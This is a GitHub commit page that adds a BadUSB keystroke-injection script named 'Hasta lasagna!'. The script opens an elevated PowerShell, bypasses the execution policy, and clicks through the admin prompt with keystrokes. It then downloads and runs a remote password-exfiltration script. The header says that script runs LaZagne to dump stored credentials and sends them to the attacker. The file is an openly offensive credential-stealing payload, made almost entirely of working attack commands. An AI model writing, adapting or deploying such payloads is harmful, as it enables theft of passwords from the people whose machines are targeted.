Hasta lasagna!

pull/155/head
m4ki3lf0 2022-10-08 13:56:20 +02:00 committed by GitHub
parent 3945e5de85
commit e55f4ff3ad
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 17 additions and 0 deletions

View File

@ -0,0 +1,17 @@
REM TITLE "Hasta lasagna!"
REM AUTHOR m4ki3lf0
REM TARGET Approved on Win10, Probably working on Win11
REM DESCRIPTION This will download the password exfiltration script (your modified version for your preferred exfiltration method), download execute lazagne.exe save result to a file and send it to yourself
REM VERSION 1.0
DEFAULT_DELAY 300
DELAY 1000
GUI r
STRING powershell -exec bypass -NoP
CTRL SHIFT ENTER
DELAY 100
LEFT
ENTER
DELAY 100
STRING iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/m4ki3lf0/BadUsbScripts/main/PasswordExfiltration/PasswordExfiltration.ps1')
ENTER